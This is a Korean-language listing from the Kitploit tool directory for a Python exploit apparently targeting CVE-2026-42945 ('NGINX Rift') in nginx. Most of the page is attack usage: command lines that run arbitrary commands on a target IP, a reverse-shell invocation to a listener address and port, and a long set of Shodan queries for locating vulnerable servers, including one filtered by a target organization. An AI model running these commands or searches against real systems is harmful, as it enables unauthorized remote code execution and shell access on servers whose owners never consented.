Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-42945-NGINX-Rift — CVE-2026-42945 (NGINX Rift)에 대한 Python 익스플로잇: 리버스 셸 기능 및 침투 테스트를 위한 Shodan 기반 대상 검색 기능 포함. | Kitploit
도구/GitHubGitHub/renison-gohel/cve-2026-42945-nginx-rift
ReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubrenison-gohel/cve-2026-42945-nginx-rift

CVE-2026-42945-NGINX-Rift

CVE-2026-42945 (NGINX Rift)에 대한 Python 익스플로잇: 리버스 셸 기능 및 침투 테스트를 위한 Shodan 기반 대상 검색 기능 포함.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
13개월 전아직 검토되지 않음

CVE-2026-42945-NGINX-Rift

root@kitploit:~
# Basic usage with target IP
python3 exploit.py --target-ip 192.168.1.100 --cmd "id"

# With custom port
python3 exploit.py --target-ip 192.168.1.100 --port 8080 --cmd "id"

# Reverse shell
python3 exploit.py --target-ip 192.168.1.100 --shell --listen-ip 10.0.0.1 --listen-port 4444

# Using the old --host parameter (still works)
python3 exploit.py --host 192.168.1.100 --cmd "id"

Shodan 검색 쿼리

주요 Shodan 검색 쿼리:

root@kitploit:~
# Most specific - looking for nginx with the rift vulnerability pattern
http.title:"nginx" port:"19321"

# More general nginx search on non-standard ports
nginx port:"19321"

# Search for nginx with potential rift vulnerability indicators
"nginx/1." "19321"

# Search for nginx on high ports (common for test/dev environments)
nginx port:"8000-9000" http.title:"nginx"

# Search for nginx with specific headers that might indicate vulnerable config
"Server: nginx" "X-Delay"

더 정밀한 쿼리:

root@kitploit:~
# Looking for nginx on the specific port used in the exploit
port:19321 nginx

# Find nginx servers that might be running in development environments
nginx "Welcome to nginx" port:8080,8000,8888,19321

# Search for nginx with unusual port ranges (where rift might be deployed)
nginx port:10000-20000

# Combining with HTTP methods that might indicate the rift endpoint
"POST /spray" http.title:nginx

고급 Shodan 필터:

root@kitploit:~
# Very specific - looking for the exact port and nginx
port:19321 org:"Your Target Organization"

# Find nginx on all non-standard ports (excluding 80,443,8080)
nginx -port:80,443,8080

# Search by country and nginx on specific port
port:19321 country:US nginx

# Find nginx with potential debug/admin interfaces
http.title:"nginx" http.status:200 port:8000-9000
도구 다운로드